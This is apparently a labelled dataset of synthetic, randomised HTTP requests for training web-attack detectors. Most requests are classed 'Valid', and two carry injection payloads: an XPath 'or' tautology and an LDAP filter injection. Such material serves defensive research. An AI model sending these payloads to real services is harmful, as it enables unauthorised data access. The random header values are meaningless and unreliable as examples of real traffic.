Accept-Encoding: deflate, compress, gzip, deflate;q=0.7
Accept-Language: *
Cache-Control: max-age=55
Client-ip: 93.120.206.213
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="388"
Date: Thu, 10 Sep 09 11:24:01 UTC
ETag: W/"iHQda_C-FUBqOY_S"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Sun, 22 May 05 23:23:40 GMT
If-Unmodified-Since: Fri, 07 Jul 06 12:36:11 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Mar 10 18:08:16 CET
Max-Forwards: 8427
MIME-Version: 1.2
Pragma: untcE=gult
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: NTLM Zm9ybmxlcm9mYWllQ2VldHN0ZXFodHVlaTFhaW9pc2FzeUFlYWVoVmdw
Range: 6-14333,6-
Referer: /ypin4t/ee1h/ufteA7nr.cgi
TE: chunked;q=0.8,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/2.1 (Windows; U; WinNT 7.0; eo-po; rv:8.1.4) Gecko/39920367
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: gzip
Upgrade: twae/5.1, nre/5.1, sorl/5.5, eiO/2.7
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 00220093101680020421
----: -------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28111
Start - Id: 21620
class: Valid
GET /sptEi23i/limgleg96winntz7httpsPoyw/9gyz91CW98ck/eqaseqi/@b7fK4/9mUCG5sPs5/uh2r0pne1upEAnj/yXvTk8/sotaaepcuneo.jpeg?7id9n=kfC&sruh8=g-rCmgJx.&lR6=tmfhestylewget&usc7rxyaioe=740278&azRyuA9d2ssauA=+naes&imae1=Esnd&stEses4i=tkD.4nb1&tE4i=Iejeas&fdns=618496736&rMtys=oqzd-pa2M3&ioeltFsinsiqav=tbinrmnrdropew7%2Foa HTTP/1.1
Host: www.prlrr.st:10
Connection: stadecm
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2, windows-1258
Accept-Encoding: *
Accept-Language: ehewrd-feys2ha;q=0.2, 1silny-iyh2tRn;q=0.7, Daaa-u5;q=0.4, ueew-sr;q=0.1, bQnush-dh6wuuN0;q=0.6
Cache-Control: apaet='Ly'
Client-ip: 125.106.235.5
Cookie: dGaa=l8IRitrmQv9otttom
Cookie2: $Version="682"
Date: Fri, 24 Apr 09 24:09:29 UTC
ETag: "7ly7eaghEhD_adE97d"
Expect: lohdmynl=kg19oei;9uuei
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 04 Aug 07 23:44:28 UTC
If-Unmodified-Since: Wed, 23 Aug 06 05:40:28 CET
If-Match: "eCrvrfq_IUKGCe6"
If-None-Match: *
If-Range: "wX8XjCXFL@gPrntzp"
Max-Forwards: 6
MIME-Version: 5.4
Pragma: ifd='1ll35'
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: Basic emloc3JFOm9jRW1h
Range: 6048-2960,4571-86
Referer: /Tvie/RThe/lelaea.shtml
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/6.8 (X11; U; SunOS sun4u 1.2; nr-6g; rv:4.9.3) Gecko/54153663
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 767x833
Via: FTP/0.6 www.dnortom.html, HTTP/7.9 220.128.255.173
Transfer-Encoding: identity
Upgrade: codse/2.4, Orte/3.9, dttr/7.6, cTjdn/1.0, iaatOs/2.1
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 0418048557333038
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21620
Start - Id: 15213
class: Valid
GET /r0P3Y_pRCRoDt./gaaxKnTsreAakhh/iE42@EemZq5Zh8A/eB5eHYTr/ku/VMe9lib9P/8Vx3P@Dc/cnrarliaeiewesve9r.jpg? HTTP/1.0
Host: 62.55.51.217:1971
Connection: jfdddoc
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.3
Accept-Encoding: deflate;q=0.6, identity;q=0.2, gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 125.214.101.106
Cookie: prraplwhlct=ize6
Cookie2: $Version="236"
Date: Wed, 18 Feb 04 20:01:40 CET
ETag: W/"grcWbb5R9D8sMYyIp5"
Expect: 100-continue
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Mon, 30 Jun 08 22:43:01 GMT
If-Unmodified-Since: Mon, 02 Jul 07 17:39:54 GMT
If-Match: "jFgC1m8Uef9g@VoW_EcL"
If-None-Match: "8Su@DSjGGWdDd0sWe@9Z"
If-Range: Fri, 22 Sep 06 04:03:06 CET
Max-Forwards: 26
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM ZTEwbzFkMm50TGhuc25ob2lFbjJzaGhvbXV0bWV0b2N0bm9sYXJzcWNuZXQ=
Authorization: 2oKd dti7nal=t6ihpnaA
Range: -29,-3
Referer: /eih8huh/48stnn/elain.aspx
TE: chunked;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 9.1; ro-oe; rv:8.6.6) Gecko/82452296
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1443x630
Via: 3.6 231.1.56.174, 6.3 150.188.190.171:854, 7.5 214.124.169.237
Transfer-Encoding: identity
Upgrade: jwhdr/3.5, rnh/9.6, ekqpn/9.6, ixea/2.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 66124683
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15213
Start - Id: 9751
class: Valid
GET /rogshpil8fO8aNeidsna/ablpobou/tky48ase5/betnnu/c9LJ_nCv/kXhjT6.16FcyGln@/A83qr5R4andSB_D-/0Y1N3j8.asmx?ttrmoa=9aautoexecanihbehCx&aqElooanLau=91008230&cnevoO6iIigICe=hw HTTP/1.1
Host: 2.199.183.232
Connection: Ttrnldhn
Accept: application/*;q=0.9, application/x-tar, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 63.10.196.4
Cookie: rUcathLl=570720;ttwXleare=adminq3 Rmt;nfoaeoyexowqie=LfNt0>szd enYe do;1Tortiddc8otRW=t6WqPgPnW;dne7=oioqsuyrADAeE;dwutn=a5
Cookie2: $Version="013"
Date: Fri, 30 Dec 05 06:31:05 UTC
ETag: "4fivot.J_rjq4aU"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Sun, 18 Sep 05 04:44:13 CET
If-Unmodified-Since: Mon, 15 Dec 08 24:32:45 UTC
If-Match: "BDFwfTzvehUb0Z.w.MPB"
If-None-Match: *
If-Range: Sat, 18 Feb 06 11:06:00 UTC
Max-Forwards: 424
MIME-Version: 4.6
Pragma: a='tyF'
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: zeeA ffuqrijn=eo5rchOa
Range: 2-18,-5
Referer: http://zteprII.st/sdoYle8/enmui/szrm/rruEb/wwohso6o.css
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Pfdso (nxQtje0xqE; pSxsoIDxjt; njg5wwK; 6R50vY6uPa; nl-ns6qdS)
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6817x021
Via: HTTP/8.1 195.143.175.30, HTTP/4.8 www.gmreZr.jpg, 4.1 www.Gtdnn6x.shtml
Transfer-Encoding: gzip
Upgrade: hwievr/3.7
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 937322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9751
Start - Id: 1865
class: Valid
GET /hnhuyadq2nr4/eQeQiI0CFKu/e9.jsp?dbebsniNno=0973&ettcOie1u=zitOhcs33X1si&qoiuts=sor&sua=33388341&a2r=y5zjHmq&OZAhtacces2S=t3%40x7DOm&oMUp3varFIexz=mnorhtaccesa5+rp%5Bc&EpK.bodyHPcD=78820659&ulT=rnvbscriptdcipc+sieo7O&eyer=o-k-dMnWNaoA&tcossiv5oernsx=shutdowno+gz+us&yO8=8&irokahp=%3F HTTP/1.1
Host: 255.91.227.124:15
Connection: lefhae
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate;q=0.3, identity
Accept-Language: mx-e
Cache-Control: no-store
Client-ip: 188.102.222.214
Cookie: 2hHeiNzey6nttGr=ao0vAft:sz4gwheref;g3Ro=2anvi;0eOi=aieasm;dnehseeiesl=2005;rui3le=aVMFV07aU;e5Tabis=030
Cookie2: $Version="352"
Date: Fri, 08 Jan 10 18:20:12 CET
ETag: "Ty0wDG9@E2TZkjfe"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Sat, 17 Apr 10 12:46:57 UTC
If-Unmodified-Since: Sat, 28 Aug 04 23:58:03 UTC
If-Match: *
If-None-Match: "To2JtdrmX0kd@WpL8gRs"
If-Range: Wed, 24 Oct 07 01:16:05 GMT
Max-Forwards: 6
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: oeit cahI=ti1tlwm
Authorization: Basic NGxsQmRlOnJ0Zzdw
Range: -4,19022-,558645-4370
Referer: http://SniLdAeE.biz/nolaoiI/nkzstiet/hthbMtDI/webQ8h/i2ng.php
TE: gzip;q=0.3,chunked,gzip
Trailer: Range
User-Agent: ehsessia2s (nh.acP; iuR06fgUOt; 8cJsa_QF)
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 899x371
Via: 3.6 www.odtbs.js, HTTP/6.7 www.IEedgh.gif
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 710 www.63f6T2cn.css "SbabsU" "Tue, 01 Aug 06 20:42:57 GMT"
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1865
Start - Id: 17695
class: Valid
GET /IW-dSbTCCbE5PhP/ftp0sNH8/0qONStqmcopyH1/ohntsa1cErv/0c8tr_-NSw6iFv/Eert/lbooe/u9jpta/_6FVUSYsnc.php3? HTTP/1.0
Host: 192.100.22.199:32
Connection: close
Accept: audio/basic, text/plain;q=0.5, text/html;q=0.9
Accept-Charset: x-mac-greek;q=0.0, x-mac-japanese, isiri-3342;q=0.5, koi8-r;q=0.6, cp-936
Accept-Encoding: 
Accept-Language: twi-d5, 8tdH-oypfdnm;q=0.0, tevnvu7-ricghb;q=0.8, c7le-srkcpgo;q=0.5, hl-Pph;q=0.1
Cache-Control: no-transform
Client-ip: 182.226.45.19
Cookie: w3t=lpewPgJgO9b;qctnfor7xzaLdf=6pterUzdZiiorNir
Cookie2: $Version="422"
Date: Thu, 15 Jan 09 04:15:32 CET
ETag: "g5X3qQklCcbMV3xJWAc"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Sun, 23 Apr 06 06:29:29 CET
If-Unmodified-Since: Fri, 06 May 05 05:53:56 UTC
If-Match: *
If-None-Match: "z4zFi1x7bKQ-Ka1jXV"
If-Range: *
Max-Forwards: 642
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: NTLM eDhqM2hyc3dudzl5U25leWVycmNybnNlM2Vja2dnYTdoSWx4M3M=
Range: -975179,89-931
Referer: /rciebee/i0hI/ejtpoi6C.cfm
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: opNJtA1 http://www.dsrwno.biz
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5218x1595
Via: 8.2 www.p3ednt.js, HTTP/1.0 www.t6innthe.jpeg, HTTP/5.3 www.efn0.png
Transfer-Encoding: gzip
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 359 www.i8Euno.jpeg "uita6ivdt8" 
X-Forwarded-For: 36.178.47.35
X-Serial-Number: 1990528944468
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17695
Start - Id: 49292
class: XPathInjection
GET /nJ2Py8cWuUC/Itssa6at/mnR4pYtSj/ek26eUqXLIM/rewdoryr/t90yOLPLB/lS/tbXGymjhNLTxEo0etVL/1positions5Xiqe/0Z@A.html?oaieuh=igdraWp&fiexecEXlE4wherehNS=83178481&ewocanc=927823&Ec=205403&atwmfe60stU=wpnjoh%2Fmk%2Fi12xl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D912%5D+++++or++++%27oR%27++++%3D++++%27&ixCaah=2&85Zohlikeq5uFmF=eSQ7mxJUBSt&f8ha0sehninE0t=6&zDVYQ=tK7UzkqvAv&Lrtrn=otreplacelH&7MvXYkgUinputr@=clsuseumi&GuAd4stdinp=maai2cmasindg%25vii-n&tn4oih=susa2dmSnnn&csmondrz=ffperle7m%3Eubin HTTP/1.0
Host: www.snzr0eng.cz:91148
Connection: yitg
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 226.125.42.173
Cookie: oann7An3=olue5Tieiaoin;cIeg=l52yKX53;reeIt=67318503;tt7syi=vliavo;nahEon5f=06;tpeSFhbeauxmno=Ot
Cookie2: $Version="213"
Date: Sun, 17 Jun 07 16:45:12 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 07 Mar 08 16:40:00 CET
If-Unmodified-Since: Tue, 24 May 05 24:14:54 UTC
If-Match: "RMc47jcQaFgUPKS"
If-None-Match: "Tv_8_QwBhSU1limYRq8"
If-Range: *
Max-Forwards: 0874
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: OmthsX Nttea6=9rlenb
Range: 305761-528973
Referer: /fnufjI/li2os/toO5he.mpeg
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: hysiey (fRNp@_1O)
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7888x6205
Via: 5.4 www.N4S3sv.shtml:33, vgb/4.0 153.198.61.121, tRHui/9.5 109.76.251.84
Transfer-Encoding: tnnc
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49292
Start - Id: 17163
class: Valid
GET /nmrF5sSc9sat/azg/ioeBQLD5/08actla9iwsqb1/p-BjKug_elXwU/0bikneuffSo9xct/-rpwUrw/9sQ0KdehHASR1IuZ/Ecsrjt/ancebsonniessf8l5/meEPuEoayGObta.html?godennouanliief=618&sSmetansieE3=dfoh%7Ep9et%26sijYbdsgt%26&rmql.7bodyJgx_G=l+sIkadmins%3F%27d%24texmlbot&vhOA=erHaeo%3Daizts&b1admin7Y=M HTTP/1.0
Host: 158.139.165.25:89321
Connection: 1etetDoc
Accept: */*;q=0.5
Accept-Charset: windows-1252;q=0.1, windows-1252, utf-8;q=0.7, iso-8859-8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: max-age=19173
Client-ip: 193.42.5.207
Cookie: aueegoaxpP=ptrcnnis5;etts=8060909;fil=re+s;awratteteDh=sJ1_ez;rvnjaoFH=rMr7W;r0w=4350
Cookie2: $Version="255"
Date: Wed, 16 Nov 05 12:41:18 UTC
ETag: W/"fC2iwVqebiOk3RGH"
Expect: hstde=1ellit
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Mon, 20 Oct 08 14:14:16 UTC
If-Match: "yWObsC3oP4TANMk8"
If-None-Match: *
If-Range: Wed, 15 Aug 07 21:33:21 CET
Max-Forwards: 3
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: iis40p ltrk2=itoiems
Range: 390931-971113
Referer: /rdshtu4/dehnsr/twte/ttaurttG/j1is2rd.php3
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: tuoPth/6.2.6.6
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 1.7 www.mona.jpeg
Transfer-Encoding: identity
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17163
Start - Id: 30123
class: Valid
GET /h.lKYlots3h9FAxI/tnYwZpYnn.sh?iz2tko9t=ylandHi&gg=i_3k3p3C&gneToe=3825772&1EyRjeeet=63057974&d0LnfWdz=zg5o%28&wohednn4lDkzd=505 HTTP/1.0
Host: 163.0.8.27
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: uLthx=so
Client-ip: 216.196.168.33
Cookie: CT9o7=tdeleterf;SIeoKbGhttpB=exxdjy-KlnrL;fmdBte=tanvhihdoiitv;Stsazsso5=4729286;fAi=style%5D5+I%26rpn%3Ferd%26rcpptt;ku1ARUD%ufCWD=5162809
Cookie2: $Version="58"
Date: Wed, 11 Apr 07 14:44:56 CET
ETag: "6MwatW4h5STU1NagH"
Expect: gdnE=peheesa
From: eettdr7o@qfttmcl.uk
If-Modified-Since: Fri, 16 Sep 05 01:41:02 CET
If-Unmodified-Since: Sun, 01 Jan 06 12:20:25 UTC
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: *
If-Range: Thu, 28 Jan 10 19:45:00 GMT
Max-Forwards: 9795
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: Digest qop=oaitee
Range: -3400,603295-
Referer: /pLmunAs/in7l/bot8/etoesfni.gif
TE: gzip
Trailer: Date
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 4.4; 2E-in; rv:6.8.1) Gecko/09634314
UA-CPU: Sparc
UA-Disp: 834,9850,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 146x988
Via: 7.5 www.pbtlsll5.html:0815, 2.3 61.51.127.101
Transfer-Encoding: cvsCs
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 419 134.75.220.213:3618 "tmoeaaern" 
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 541000
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30123
Start - Id: 22405
class: Valid
GET /aYN6dP-FPM.dI/iEfrmtovrnmenxIr5tze.shtml? HTTP/1.0
Host: www.eina.gov
Connection: close
Accept: video/*, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 195.143.59.185
Cookie: oearaen=12242;clohXr2oat=880254
Cookie2: $Version="025"
Date: Tue, 16 Jun 09 05:05:44 CET
ETag: "YYFg_yu6KSP23m7mP"
Expect: 100-continue
From: osurT@isn3pers.uk
If-Modified-Since: Mon, 15 Nov 04 06:40:25 CET
If-Unmodified-Since: Fri, 05 May 06 07:10:13 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: Sun, 08 May 05 23:06:26 UTC
Max-Forwards: 3
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: Digest nonce
Range: -333
Referer: /htkrso/wee8hdE.pl
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: kzoiq/1.3.1.8.0
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 0.2 www.fvTehxe.htm
Transfer-Encoding: gzip
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22405
Start - Id: 25298
class: Valid
GET /eG_8832PXAeV/PQq/heNnwtiu.jpg?bYfive3at5es=eNz&rmAlx=1988&nulikeRzomc9rZ=818&0r91AiJs1=setk6ipibsm+q&Dstellst=9956758&KOZGvE=ia&izt3gomtv=rsaoedlaLq HTTP/1.1
Host: 144.27.85.50
Connection: close
Accept: video/mpeg;q=0.3, audio/*, image/*;q=0.4
Accept-Charset: utf-8;q=0.7, windows-1258;q=0.0, x-mac-hebrew;q=0.0, x-mac-korean;q=0.3, x-mac-korean;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 93.156.218.54
Cookie: 59inW_sT@zwphpm=826254;ooteSutdCsesf=mhAfOzbE0eny
Cookie2: $Version="74"
Date: Fri, 21 Aug 09 03:27:26 GMT
ETag: W/"u1nR_3pFCSqH8kdr"
Expect: 9b3i
From: xion@agin3dxsi.be
If-Modified-Since: Thu, 17 Aug 06 15:24:19 GMT
If-Unmodified-Since: Sun, 25 Apr 04 12:58:32 UTC
If-Match: "AJY2cz@Uxe9Lx_4i"
If-None-Match: "Oc-Zy-en@MvQGiBvho"
If-Range: Fri, 20 Jan 06 06:03:55 UTC
Max-Forwards: 8
MIME-Version: 9.9
Pragma: rsrchn=ea
Proxy-Authorization: NTLM YXI2aGl0d2VvZWFpc3V5c29hb2VncG9rVHNxbml1ZXJFZW1FZXQybm10bA==
Authorization: iawse nntopa=sDjjar
Range: 69-01
Referer: /htluti/ldsb/aeitSsn.php
TE: chunked;q=0.2,deflate
Trailer: If-Range
User-Agent: s2D4@oCtd2 http://www.hrap.biz
UA-CPU: Sparc
UA-Disp: 9449,218,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9336x783
Via: 1.7 208.229.15.136, n3so/5.3 17.148.247.223
Transfer-Encoding: identity
Upgrade: 4slo/3.2, rhinrd/9.2
Warning: 776 www.rdYxT.js:39275 "ktn2Rsp3eeodnxlt1dmc" "Sat, 28 Jun 08 20:23:50 UTC"
X-Forwarded-For: 57.51.182.235
X-Serial-Number: 139373036597408522
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25298
Start - Id: 32962
class: Valid
PUT /ew/anebtiictue/eyrenftrHtblctuiwts/78@IFDpMVlXgLm/y37VjML/lgmerqrsex9pn/qnleesd.jpg? HTTP/1.0
Content-Length: 295
Content-Language: 4pa,nnxtin,vtbjH6u
Content-Encoding: gzip
Content-Location: http://www.t9iid.cz/ette5/rtjat/8oemf/e21i.php
Content-MD5: b2VuNXhjN3RhaWVlZW90Vw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 04 10:49:01 CET
Last-Modified: Wed, 12 Oct 05 24:48:01 CET
Host: 177.141.162.125
Connection: keep-alive
Accept: application/rtf;q=0.6, audio/*;q=0.4, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 87.43.35.131
Cookie: aceYjsbuesner4e=oeg;wtUid=a is;tlaadn=1dluet4jq6ilyosvt;StRd=7kNLS;nteIdiUxros8=gMXRimN@;ecbpe=opdm8RD
Cookie2: $Version="9"
Date: Sat, 23 Dec 06 07:10:45 UTC
ETag: "VaitjbTg0I9gGkX3h"
Expect: rgnNuOh
From: T2hnaaf@eteaviqo.cz
If-Modified-Since: Sat, 23 Jan 10 19:22:38 CET
If-Unmodified-Since: Tue, 26 Oct 04 01:19:25 CET
If-Match: *
If-None-Match: "qjPLN1ska.Bkk-ZizG"
If-Range: Tue, 26 Dec 06 13:57:30 CET
Max-Forwards: 4
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: Digest algorithm=kkye
Range: -67900,74-11848
Referer: http://drGbm8nd.uk/sufneetI/7Iet/fumtm9.mpg
TE: deflate;q=0.1,chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (X11; U; Solaris 5.8; dT-tc; rv:0.4.0) Gecko/16519454
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 532x605
Via: FTP/1.7 www.fIfeuZSw.jpeg, HTTP/5.8 106.239.87.225, 4.8 www.c6n7n1a.jpg
Transfer-Encoding: tnrea; a4kcy=otjaoe
Upgrade: bja5e/7.6
Warning: 432 175.168.172.127 "tr8n3rmtlSfh" 
X-Forwarded-For: 55.183.39.168
X-Serial-Number: 8256064879987524435
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7U5divusa=36&atnk2y3tchj=tqTv4VGzC23&metulmhWxi=evasEyafwb&guee2=Dhemni7t3vlc4ar&itrNthkijInihsk=fxYNKDN2jM&wczheztmvhsaig=Ww4rcselect3oSel&7ac=iue&and2ZKlocationsn6=1eETmtrrwehmr&f3l3=7122832135&saheTetron=eoielese5q0emeaof&ylhtegIqpiSc=h4yscriptI&w9tedmofnhshn=oc6c~bteE&It=r>a~onie rr6s

End - Id: 32962
Start - Id: 38643
class: LdapInjection
GET /dq4p8i/fyrHrt2ijIrolo7heo/eRPMu/7UJar./ye6cgiaidnTt/APT0/nushyn/av5/JgX8-8.htm?zyLoRaeuiEptn=28&mN8efwne=%29++++%28+++%7C++++%28Raeeo%3Dnhae*%29 HTTP/1.1
Host: www.nxswt5u.biz
Connection: ceti
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-japanese;q=0.4, utf-7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: max-age=6815
Client-ip: 48.249.181.128
Cookie: Ydesd=6;hotGsmvp=39917;QHzLspasswdzhtpassa=:D;r1=oPi3o;hcsepxbytmNwsbo=k1lvb8wgoeQ
Cookie2: $Version="43"
Date: Sat, 18 Sep 04 15:59:17 CET
ETag: "eKCAKEPvcEVEuaN0"
Expect: sedr=mo9hfett
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Sun, 26 Feb 06 07:44:40 CET
If-Unmodified-Since: Wed, 05 Jul 06 23:29:34 UTC
If-Match: "AT@w0T@9Z.U5KU3efzq"
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 364
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /9N7iem/4mqeEh/ucet/enoeotUz.swf
TE: chunked;q=0.4,deflate;q=0.6
Trailer: Authorization
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 3.3; es-se; rv:2.0.7) Gecko/92631298
UA-CPU: 68000
UA-Disp: 397,637,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.0 www.hnn9eise.gif:014
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38643
Start - Id: 25885
class: Valid
